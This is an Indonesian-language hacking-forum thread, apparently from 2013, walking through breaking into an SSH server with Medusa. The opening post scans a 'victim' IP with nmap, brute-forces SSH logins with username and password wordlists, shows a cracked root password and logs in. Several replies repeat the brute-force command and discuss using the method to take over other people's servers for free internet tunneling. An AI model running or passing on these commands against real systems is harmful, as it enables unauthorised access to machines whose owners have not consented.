Breaking into SSH using Medusa

**[H2]** · 09-10-2013, 09:59 PM

Kebetulan belum ada yang membahas tools Medusa, so. saya coba bahas ya =)

Keterangan:
SSH Atau Secure Shell adalah sebuah protokol jaringan di mana klien dapat bertukar data melalui jaringan yang aman antara dua perangkat sebagai jaringan remote. hal ini banyak digunakan dalam Operasi sistem GNU Linux dan Unix.

Medusa:
medusa adalah alat BruteForce dengan pelayanan yang cepat untuk menampilkan password "SSH,FTP,HTTP,MySQL,Telnet, VNC dan banyak lagi.

Equipments :
1. medusa
2. Nmap

Scan ip yang menjadi target kita menggunakan Nmap

Code:
# nmap -sV xxx.xxx.xxx

-sV : Probe open ports to determine service/version info
xxx.xxx.xxx.xxx : ip-victim

Spoiler! :

terlihat pada gambar diatas, port 22 service ssh terbuka jadi sangat besar kemungkinan kita dapat melakukan pengeksploitasian =)

selanjutnya kita BruteForce menggunakan Medusa untuk mengetahui username dan password victim:

Code:
# medusa -h xxx.xxx.xxx.xxx -U USER.txt -P PASS.txt -e ns -M ssh -v 4

-h : Target hostname or IP address
-U : File containing usernames
-P : File containing passwords
-e : Additional password checks ([n] No Password, [s] Password = Username)
-M : Name of the module to execute
-v : Verbose level

Spoiler! :

ACCOUNT FOUND =))
Username = root
Password = r00t

sekarang mari kita login

Code:

# ssh [email protected]

Spoiler! :

Sukses =))

CATATAN: pada dasarnya tidak semudah seperti dalam pengujian yang saya lakukan, bahwa Anda harus mempersiapkan wordlist yang besar serta keberuntungan yang berpihak kepada anda =)

Regards IBT

source

**Elfnine-x3** · 09-10-2013, 10:47 PM

huum.,..oh iya apakah konsep seperti ini yang biasa di gunakan beberapa orang untuk mencari akun SSH tunneling untuk internet gratis dari beberpa provider sepert Sma****fre* dll ???

**alkaaf** · 09-11-2013, 07:03 AM

(09-10-2013, 10:47 PM)Elfnine-x3 Wrote: huum.,..oh iya apakah konsep seperti ini yang biasa di gunakan beberapa orang untuk mencari akun SSH tunneling untuk internet gratis dari beberpa provider sepert Sma****fre* dll ???

ssh nya beda om. Big Grin

diatas tuh ssh nya untuk remote. sedangkan inet gratis ssh dipakai tunneling. tapi kalo masalah bruteforece mungkin bisa bro.

**m0nk3y** · 11-28-2013, 09:23 PM

om..
ane nubi nih... mau tanya..

Wordlistnya disimpan di mana ya ..?

salam kenal...\m/

**drewcode** · 11-28-2013, 10:26 PM

(11-28-2013, 09:23 PM)m0nk3y Wrote: om..
ane nubi nih... mau tanya..

Wordlistnya disimpan di mana ya ..?

salam kenal...\m/

penyimpanan wordlist bebas om dimana aja.. asal jangan taro di toples =)) nanti susah di panggilnya :p

taro aja di directiory root, jadi nanti tinggal
medusa -h xxx.xxx.xxx.xxx -U USER.txt -P PASS.txt -e ns -M ssh -v 4

**abdilahrf** · 12-13-2013, 07:44 PM

ane posting ke blog ya postinganya om H2 Big Grin

http://indonesianbacktrack.or.id/forum/thread-5035.html

- ini http://jabodetabek.indonesianbacktrack.o...edusa.html

**[H2]** · 12-13-2013, 09:32 PM

(12-13-2013, 07:44 PM)abdilahrf Wrote: ane posting ke blog ya postinganya om H2
/forum/thread-5035.html

- ini /2013/12/breaking-into-ssh-using-medusa.html

silahkan mas :-bd

**badwolves1986** · 12-14-2013, 06:26 AM

Wih keren pake medusa Big Grin

ijin cobain omz

**mywisdom** · 12-14-2013, 06:45 AM

nice share bro

zee eichel · 12-14-2013, 02:10 PM

(09-11-2013, 07:03 AM)alkaaf Wrote:
(09-10-2013, 10:47 PM)Elfnine-x3 Wrote: huum.,..oh iya apakah konsep seperti ini yang biasa di gunakan beberapa orang untuk mencari akun SSH tunneling untuk internet gratis dari beberpa provider sepert Sma****fre* dll ???

ssh nya beda om. diatas tuh ssh nya untuk remote. sedangkan inet gratis ssh dipakai tunneling. tapi kalo masalah bruteforece mungkin bisa bro.

bisa menjadi kemungkinan bro krn notabenenya orang butuh server dengan koneksi ssh buat bikin tunneling jadi metode bruteforce ini bisa menjadi salah satu metode untuk dapetin server